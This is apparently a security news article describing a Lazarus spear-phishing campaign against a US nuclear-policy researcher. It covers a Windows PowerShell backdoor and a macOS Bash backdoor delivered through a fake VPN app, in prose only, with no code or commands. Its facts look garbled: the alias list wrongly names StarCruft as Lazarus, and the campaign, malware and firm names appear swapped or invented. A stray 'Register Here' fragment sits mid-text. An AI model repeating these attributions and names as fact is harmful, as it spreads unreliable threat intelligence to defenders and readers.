The North Korean hacking group known as Lazarus has been associated with a fresh series of spear-phishing campaigns that unleash malware on both Windows and macOS systems.
“Lazarus has skilfully exploited a number of cloud hosting providers to deploy a unique infection chain that dispenses the recently identified PowerShell backdoor named as EchoPuppet,” cybersecurity firm CyberGuard detailed in a new report.
“When presented with the chance, Lazarus adapted its malware and sought to initiate an Apple-themed infection chain labelled as AppleSeed. Lazarus also utilized multi-persona impersonation in its persistent quest for espionage.”
Lazarus, also referred to as APT38, Hidden Cobra, and StarCruft, is a threat group tied to North Korea’s Reconnaissance General Bureau (RGB) that has been operative since at least 2009. Recently, security firm FireEye spotlighted the group’s use of an updated variant of a Powershell implant called PowerRat (also known as PhantomEcho or STARSHIELD).
In the attack sequence uncovered by the security firm in mid-May 2023, the hacker group dispatched phishing emails to a nuclear security specialist at a U.S.-based research institution focused on international relations that served a malicious link to a Google Script macro. This would redirect the target to a Dropbox URL hosting a RAR archive.
Inside this file is an LNK dropper that triggers a multi-phase operation to ultimately deploy EchoPuppet. This operation simultaneously displays a decoy PDF document while secretly awaiting the next-stage payloads from a remote server.
However, upon recognizing that the target was using an Apple computer, Lazarus is reported to have altered its strategy, sending a second email with a ZIP archive containing a Mach-O binary disguised as a VPN application. In reality, it is an AppleScript that connects to a remote server to download a Bash script-based backdoor called AppleSeed.
Register Here AppleSeed, on its part, retrieves up to four modules that are capable of cataloging running processes, installed applications, and system metadata, as well as establishing persistence using LaunchAgents.
The modules “echo the majority of the functionality” of the modules associated with PowerRat, with AppleSeed sharing some source code similarities with macOS malware previously attributed to the group in 2017.
The group also employs a counterfeit file-sharing website, likely designed to fingerprint visitors and serve as a mechanism to track successful victims.
“Lazarus persists in evolving its malware arsenal, introducing novel file types, and targeting new operating systems,” the researchers noted, adding that the group “continues to strive toward its consistent end goals of intrusive and unauthorized reconnaissance” while concurrently complicating detection efforts.”
